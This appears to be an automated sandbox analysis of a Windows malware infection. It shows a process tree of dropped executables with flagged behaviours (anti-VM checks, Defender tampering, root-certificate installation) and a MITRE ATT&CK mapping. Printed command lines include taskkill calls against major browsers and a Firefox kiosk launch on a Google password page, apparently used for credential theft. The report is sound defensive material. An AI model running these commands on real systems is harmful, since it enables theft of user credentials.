        Suspicious use of AdjustPrivilegeToken
        
        PID:396
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:2384
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:840
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3140
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3172
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3304
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3312
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3340
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3516
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3544
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3568
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3596
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3652
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3680
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3760
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3768
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3796
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3880
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3888
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3916
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3936
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3944
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3972
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:4004
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:4032
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4072
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:4080
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3152
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 1564"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
        
        C:\Windows\system32\find.exe
        
        find ":"
        9⤵
        
        PID:3180
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        9⤵
        Delays execution with timeout.exe
        
        PID:3208
      - C:\Users\Admin\AppData\Local\Temp\10106930101\3178e88ae0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106930101\3178e88ae0.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:880
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2808
      - C:\Users\Admin\AppData\Local\Temp\10106940101\777e11d160.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106940101\777e11d160.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\10106940101\777e11d160.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106940101\777e11d160.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1700
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 1016
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2916 -s 512
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:1492
      - C:\Users\Admin\AppData\Local\Temp\10106950101\c39706eca6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106950101\c39706eca6.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2292
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\10106960101\f0d7603e98.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106960101\f0d7603e98.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1192
      - C:\Users\Admin\AppData\Local\Temp\10106970101\cccfebf586.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106970101\cccfebf586.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 1204
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2896
      - C:\Users\Admin\AppData\Local\Temp\10106980101\1fc666ec69.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106980101\1fc666ec69.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2852
      - C:\Users\Admin\AppData\Local\Temp\10106990101\a9c3a998e8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106990101\a9c3a998e8.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:956
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:792
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2056
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1676
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.0.602999930\1928053434" -parentBuildID 20221007134813 -prefsHandle 1256 -prefMapHandle 1248 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14106462-8def-47d5-b989-b6548a5f300a} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 1372 ef05858 gpu
        9⤵
        
        PID:1204
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.1.1718182663\312118369" -parentBuildID 20221007134813 -prefsHandle 1524 -prefMapHandle 1520 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44c414ef-1b9e-47fe-a2d0-9ad66b97c1ea} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 1536 eefa258 socket
        9⤵
        
        PID:1468
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.2.1581714075\1469399443" -childID 1 -isForBrowser -prefsHandle 2144 -prefMapHandle 2140 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf43777d-f1a2-420e-9207-f5375f307b9a} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 2156 192d6a58 tab
        9⤵
        
        PID:1268
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.3.1508388703\1038956914" -childID 2 -isForBrowser -prefsHandle 2576 -prefMapHandle 2000 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f46bae0-c9a6-426e-bc5f-6b366e712891} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 2636 1b8ae158 tab
        9⤵
        
        PID:2420
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.4.1683661241\1131365894" -childID 3 -isForBrowser -prefsHandle 3880 -prefMapHandle 2676 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9118827-1f77-4c3b-b455-60480657dc8f} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 3892 20935958 tab
        9⤵
        
        PID:2380
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.5.916143983\1203138893" -childID 4 -isForBrowser -prefsHandle 4000 -prefMapHandle 4008 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f09fa838-289c-4c8f-aa94-88d04c59a988} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 3992 20936858 tab
        9⤵
        
        PID:900
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1676.6.2057051164\1187021330" -childID 5 -isForBrowser -prefsHandle 4176 -prefMapHandle 4180 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 800 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {009af037-0e92-40f9-9348-e7cfbf8388d3} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" 4164 21354958 tab
        9⤵
        
        PID:1988
      - C:\Users\Admin\AppData\Local\Temp\10107000101\80a506a4b9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107000101\80a506a4b9.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
      - C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107010101\ktxzLhN.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\dll32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion